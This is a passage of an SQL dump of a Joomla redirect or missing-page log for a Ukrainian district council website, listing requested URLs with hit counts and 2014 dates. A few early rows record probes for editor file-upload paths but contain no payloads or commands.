00:00:00',301),(5900,'http://www.malyn-rayrada.org.ua/fckeditor/editor/filemanager/connectors/php/connector.php','','','',7,0,'2014-09-30 13:54:25','0000-00-00 00:00:00',301),(5901,'http://www.malyn-rayrada.org.ua/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php','','','',7,0,'2014-09-30 13:54:30','0000-00-00 00:00:00',301),(5902,'http://www.malyn-rayrada.org.ua/includes/fckeditor/editor/filemanager/connectors/php/upload.php','','','',7,0,'2014-09-30 13:54:35','0000-00-00 00:00:00',301),(5903,'http://www.malyn-rayrada.org.ua/includes/fckeditor/editor/filemanager/upload/php/upload.php','','','',7,0,'2014-09-30 13:54:39','0000-00-00 00:00:00',301),(5904,'http://www.malyn-rayrada.org.ua/includes/fckeditor/editor/filemanager/connectors/php/connector.php','','','',7,0,'2014-09-30 13:54:44','0000-00-00 00:00:00',301),(5905,'http://www.malyn-rayrada.org.ua/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php','','','',6,0,'2014-09-30 13:54:49','0000-00-00 00:00:00',301),(5906,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php','','','',7,0,'2014-09-30 13:54:53','0000-00-00 00:00:00',301),(5907,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/connectors/php/connector.php','','','',7,0,'2014-09-30 13:54:58','0000-00-00 00:00:00',301),(5908,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/connectors/php/upload.php','','','',8,0,'2014-09-30 13:55:04','0000-00-00 00:00:00',301),(5909,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/upload/php/upload.php','','','',9,0,'2014-09-30 13:55:08','0000-00-00 00:00:00',301),(5910,'http://www.malyn-rayrada.org.ua/ckeditor/ckfinder/core/connector/php/connector.php','','','',6,0,'2014-09-30 13:55:12','0000-00-00 00:00:00',301),(5911,'http://www.malyn-rayrada.org.ua/kcfinder/browse.php','','','',6,0,'2014-09-30 13:55:15','0000-00-00 00:00:00',301),(5912,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=956:2013-03-07-14-51-33&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 13:56:41','0000-00-00 00:00:00',301),(5913,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-----&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-30 14:13:20','0000-00-00 00:00:00',301),(5914,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-30 14:20:09','0000-00-00 00:00:00',301),(5915,'http://www.malyn-rayrada.org.ua/index.php/2011-03-31-12-03-04','','','',1,0,'2014-09-30 14:23:16','0000-00-00 00:00:00',301),(5916,'http://www.malyn-rayrada.org.ua/index.php/--19122011-','','','',1,0,'2014-09-30 14:27:08','0000-00-00 00:00:00',301),(5917,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/792-informacija-lukivskoi-silskoi-radi','',91,0,'2014-09-30 14:30:50','0000-00-00 00:00:00',301),(5918,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/880-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014','',3,0,'2014-09-30 14:32:53','0000-00-00 00:00:00',301),(5919,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=914:2013-01-23-13-21-28&lang=uk&option=com_content&view=article','','','',8,0,'2014-09-30 14:39:45','0000-00-00 00:00:00',301),(5920,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1266:2014-04-03-05-25-14&lang=uk&option=com_content&view=article','','','',4,0,'2014-09-30 14:39:56','0000-00-00 00:00:00',301),(5921,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=983:2013-04-04-11-23-57&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-30 15:32:28','0000-00-00 00:00:00',301),(5922,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1088:2013-09-19-12-06-07&lang=uk&option=com_content&view=article','','','',5,0,'2014-09-30 16:14:03','0000-00-00 00:00:00',301),(5923,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1030:2013-06-17-06-46-59&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 16:14:23','0000-00-00 00:00:00',301),(5924,'http://www.malyn-rayrada.org.ua/index.php?Itemid=1&id=2&lang=uk&option=com_phocagallery&view=category','','','',1,0,'2014-09-30 16:14:28','0000-00-00 00:00:00',301),(5925,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=925:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 16:14:37','0000-00-00 00:00:00',301),(5926,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1221:2014-02-22-08-09-27&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 16:14:46','0000-00-00 00:00:00',301),(5927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=uk','','','',8,0,'2014-09-30 17:06:48','0000-00-00 00:00:00',301),(5928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:06:55','0000-00-00 00:00:00',301),(5929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-------l-r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-30 17:07:01','0000-00-00 00:00:00',301),(5930,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&Itemid=14&lang=uk','','','',2,0,'2014-09-30 17:07:09','0000-00-00 00:00:00',301),(5931,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&Itemid=95&lang=ru','','','',1,0,'2014-09-30 17:07:10','0000-00-00 00:00:00',301),(5932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&Itemid=95&lang=uk','','','',1,0,'2014-09-30 17:07:11','0000-00-00 00:00:00',301),(5933,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:-2014-&catid=59&Itemid=107&lang=ru','','','',7,0,'2014-09-30 17:07:28','0000-00-00 00:00:00',301),(5934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&Itemid=18&lang=en','','','',1,0,'2014-09-30 17:07:35','0000-00-00 00:00:00',301),(5935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:08:00','0000-00-00 00:00:00',301),(5936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-30 17:08:01','0000-00-00 00:00:00',301),(5937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&Itemid=95&lang=ru','','','',1,0,'2014-09-30 17:08:26','0000-00-00 00:00:00',301),(5938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=972:2013-03-19-10-50-05&Itemid=88&lang=uk','','','',2,0,'2014-09-30 17:08:27','0000-00-00 00:00:00',301),(5939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&Itemid=70&lang=en','','','',1,0,'2014-09-30 17:08:41','0000-00-00 00:00:00',301),(5940,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&lang=ru','','','',1,0,'2014-09-30 17:09:00','0000-00-00 00:00:00',301),(5941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:09:20','0000-00-00 00:00:00',301),(5942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:09:26','0000-00-00 00:00:00',301),(5943,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:09:34','0000-00-00 00:00:00',301),(5944,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:09:49','0000-00-00 00:00:00',301),(5945,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&Itemid=86&lang=ru','','','',1,0,'2014-09-30 17:09:55','0000-00-00 00:00:00',301),(5946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&Itemid=107&lang=ru','','','',1,0,'2014-09-30 17:09:59','0000-00-00 00:00:00',301),(5947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:09:59','0000-00-00 00:00:00',301),(5948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:10:02','0000-00-00 00:00:00',301),(5949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&Itemid=95&lang=ru','','','',1,0,'2014-09-30 17:10:03','0000-00-00 00:00:00',301),(5950,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&Itemid=95&lang=uk','','','',1,0,'2014-09-30 17:10:06','0000-00-00 00:00:00',301),(5951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&Itemid=107&lang=uk','','','',1,0,'2014-09-30 17:10:08','0000-00-00 00:00:00',301),(5952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&Itemid=70&lang=ru','','','',1,0,'2014-09-30 17:10:24','0000-00-00 00:00:00',301),(5953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&lang=ru','','','',1,0,'2014-09-30 17:10:40','0000-00-00 00:00:00',301),(5954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56&Itemid=97&lang=ru','','','',5,0,'2014-09-30 17:10:53','0000-00-00 00:00:00',301),(5955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&Itemid=18&lang=en','','','',1,0,'2014-09-30 17:10:59','0000-00-00 00:00:00',301),(5956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&lang=ru','','','',1,0,'2014-09-30 17:11:00','0000-00-00 00:00:00',301),(5957,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:11:02','0000-00-00 00:00:00',301),(5958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&Itemid=94&lang=ru','','','',1,0,'2014-09-30 17:11:23','0000-00-00 00:00:00',301),(5959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&Itemid=70&lang=en','','','',1,0,'2014-09-30 17:11:24','0000-00-00 00:00:00',301),(5960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&Itemid=94&lang=en','','','',1,0,'2014-09-30 17:11:25','0000-00-00 00:00:00',301),(5961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11&lang=ru','','','',11,0,'2014-09-30 17:11:35','0000-00-00 00:00:00',301),(5962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&Itemid=86&lang=uk','','','',1,0,'2014-09-30 17:11:35','0000-00-00 00:00:00',301),(5963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&lang=en','','','',1,0,'2014-09-30 17:11:47','0000-00-00 00:00:00',301),(5964,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&Itemid=96&lang=ru','','','',1,0,'2014-09-30 17:11:51','0000-00-00 00:00:00',301),(5965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:11:52','0000-00-00 00:00:00',301),(5966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&lang=en','','','',1,0,'2014-09-30 17:11:54','0000-00-00 00:00:00',301),(5967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&Itemid=88&lang=en','','','',1,0,'2014-09-30 17:11:56','0000-00-00 00:00:00',301),(5968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&Itemid=95&lang=ru','','','',2,0,'2014-09-30 17:12:10','0000-00-00 00:00:00',301),(5969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&Itemid=95&lang=uk','','','',1,0,'2014-09-30 17:12:20','0000-00-00 00:00:00',301),(5970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:12:21','0000-00-00 00:00:00',301),(5971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:12:22','0000-00-00 00:00:00',301),(5972,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&lang=uk','','','',1,0,'2014-09-30 17:12:26','0000-00-00 00:00:00',301),(5973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&lang=uk','','','',3,0,'2014-09-30 17:12:31','0000-00-00 00:00:00',301),(5974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&lang=ru','','','',1,0,'2014-09-30 17:12:35','0000-00-00 00:00:00',301),(5975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&lang=uk','','','',2,0,'2014-09-30 17:12:38','0000-00-00 00:00:00',301),(5976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=ru','','','',1,0,'2014-09-30 17:12:42','0000-00-00 00:00:00',301),(5977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:12:47','0000-00-00 00:00:00',301),(5978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&Itemid=97&lang=en','','','',1,0,'2014-09-30 17:12:56','0000-00-00 00:00:00',301),(5979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:12:59','0000-00-00 00:00:00',301),(5980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56&Itemid=97&lang=ru','','','',4,0,'2014-09-30 17:13:00','0000-00-00 00:00:00',301),(5981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&Itemid=14&lang=ru','','','',2,0,'2014-09-30 17:13:05','0000-00-00 00:00:00',301),(5982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&Itemid=14&lang=uk','','','',2,0,'2014-09-30 17:13:06','0000-00-00 00:00:00',301),(5983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&Itemid=70&lang=ru','','','',1,0,'2014-09-30 17:13:07','0000-00-00 00:00:00',301),(5984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:13:07','0000-00-00 00:00:00',301),(5985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&Itemid=70&lang=uk','','','',1,0,'2014-09-30 17:13:27','0000-00-00 00:00:00',301),(5986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-30 17:13:29','0000-00-00 00:00:00',301),(5987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&lang=uk&Itemid=','','','',1,0,'2014-09-30 17:13:34','0000-00-00 00:00:00',301),(5988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&lang=en','','','',1,0,'2014-09-30 17:13:35','0000-00-00 00:00:00',301),(5989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&Itemid=88&lang=ru','','','',1,0,'2014-09-30 17:13:35','0000-00-00 00:00:00',301),(5990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&lang=ru','','','',1,0,'2014-09-30 17:13:45','0000-00-00 00:00:00',301),(5991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&lang=uk','','','',1,0,'2014-09-30 17:13:47','0000-00-00 00:00:00',301),(5992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&Itemid=87&lang=en','','','',1,0,'2014-09-30 17:14:02','0000-00-00 00:00:00',301),(5993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&lang=en','','','',1,0,'2014-09-30 17:14:07','0000-00-00 00:00:00',301),(5994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48:--11032013-&Itemid=87&lang=ru','','','',4,0,'2014-09-30 17:14:12','0000-00-00 00:00:00',301),(5995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:14:33','0000-00-00 00:00:00',301),(5996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-30 17:14:39','0000-00-00 00:00:00',301),(5997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&lang=uk','','','',1,0,'2014-09-30 17:14:46','0000-00-00 00:00:00',301),(5998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&Itemid=94&lang=ru','','','',1,0,'2014-09-30 17:14:47','0000-00-00 00:00:00',301),(5999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&Itemid=88&lang=uk','','','',1,0,'2014-09-30 17:14:51','0000-00-00 00:00:00',301),(6000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:14:55','0000-00-00 00:00:00',301),(6001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&lang=ru','','','',1,0,'2014-09-30 17:15:05','0000-00-00 00:00:00',301),(6002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&Itemid=94&lang=en','','','',1,0,'2014-09-30 17:15:06','0000-00-00 00:00:00',301),(6003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&lang=en','','','',1,0,'2014-09-30 17:15:22','0000-00-00 00:00:00',301),(6004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:15:23','0000-00-00 00:00:00',301),(6005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&Itemid=96&lang=ru','','','',1,0,'2014-09-30 17:15:26','0000-00-00 00:00:00',301),(6006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1130:2013-11-07-14-04-12&lang=ru','','','',1,0,'2014-09-30 17:15:27','0000-00-00 00:00:00',301),(6007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:15:30','0000-00-00 00:00:00',301),(6008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=ru','','','',1,0,'2014-09-30 17:15:33','0000-00-00 00:00:00',301),(6009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&Itemid=70&lang=en','','','',1,0,'2014-09-30 17:15:35','0000-00-00 00:00:00',301),(6010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:15:36','0000-00-00 00:00:00',301),(6011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=ru','','','',1,0,'2014-09-30 17:15:38','0000-00-00 00:00:00',301),(6012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=uk','','','',5,0,'2014-09-30 17:15:39','0000-00-00 00:00:00',301),(6013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&Itemid=14&lang=uk','','','',1,0,'2014-09-30 17:15:41','0000-00-00 00:00:00',301),(6014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:15:43','0000-00-00 00:00:00',301),(6015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&Itemid=97&lang=uk','','','',1,0,'2014-09-30 17:15:44','0000-00-00 00:00:00',301),(6016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&Itemid=97&lang=en','','','',1,0,'2014-09-30 17:15:48','0000-00-00 00:00:00',301),(6017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:15:49','0000-00-00 00:00:00',301),(6018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&Itemid=97&lang=uk','','','',1,0,'2014-09-30 17:15:50','0000-00-00 00:00:00',301),(6019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:15:51','0000-00-00 00:00:00',301),(6020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:------2014-&Itemid=70&lang=ru','','','',1,0,'2014-09-30 17:15:53','0000-00-00 00:00:00',301),(6021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:15:58','0000-00-00 00:00:00',301),(6022,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&lang=ru','','','',1,0,'2014-09-30 17:15:59','0000-00-00 00:00:00',301),(6023,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:------25--2011--74---19--2011---193-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-30 17:16:31','0000-00-00 00:00:00',301),(6024,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&Itemid=88&lang=en','','','',1,0,'2014-09-30 17:16:32','0000-00-00 00:00:00',301),(6025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:16:35','0000-00-00 00:00:00',301),(6026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&lang=en&Itemid=0','','','',1,0,'2014-09-30 17:16:36','0000-00-00 00:00:00',301),(6027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&lang=uk','','','',1,0,'2014-09-30 17:16:39','0000-00-00 00:00:00',301),(6028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&Itemid=88&lang=en','','','',1,0,'2014-09-30 17:16:50','0000-00-00 00:00:00',301),(6029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:16:52','0000-00-00 00:00:00',301),(6030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&Itemid=14&lang=en','','','',1,0,'2014-09-30 17:16:53','0000-00-00 00:00:00',301),(6031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&lang=uk','','','',1,0,'2014-09-30 17:16:54','0000-00-00 00:00:00',301),(6032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-30 17:16:55','0000-00-00 00:00:00',301),(6033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1295:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-30 17:18:05','0000-00-00 00:00:00',301),(6034,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:18:18','0000-00-00 00:00:00',301),(6035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&lang=uk','','','',1,0,'2014-09-30 17:18:35','0000-00-00 00:00:00',301),(6036,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=888:-2012-&Itemid=85&lang=ru','','','',1,0,'2014-09-30 17:19:16','0000-00-00 00:00:00',301),(6037,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&lang=ru','','','',1,0,'2014-09-30 17:19:59','0000-00-00 00:00:00',301),(6038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&Itemid=14&lang=ru','','','',1,0,'2014-09-30 17:20:19','0000-00-00 00:00:00',301),(6039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&lang=uk','','','',1,0,'2014-09-30 17:20:41','0000-00-00 00:00:00',301),(6040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&Itemid=94&lang=ru','','','',1,0,'2014-09-30 17:21:04','0000-00-00 00:00:00',301),(6041,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=ru','','','',4,0,'2014-09-30 17:21:05','0000-00-00 00:00:00',301),(6042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&Itemid=94&lang=uk','','','',1,0,'2014-09-30 17:21:07','0000-00-00 00:00:00',301),(6043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&Itemid=14&lang=en','','','',1,0,'2014-09-30 17:21:12','0000-00-00 00:00:00',301),(6044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&lang=en','','','',1,0,'2014-09-30 17:21:15','0000-00-00 00:00:00',301),(6045,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&Itemid=97&lang=ru','','','',1,0,'2014-09-30 17:21:17','0000-00-00 00:00:00',301),(6046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&lang=uk','','','',1,0,'2014-09-30 17:21:21','0000-00-00 00:00:00',301),(6047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&lang=ru','','','',1,0,'2014-09-30 17:21:30','0000-00-00 00:00:00',301),(6048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-30 17:21:50','0000-00-00 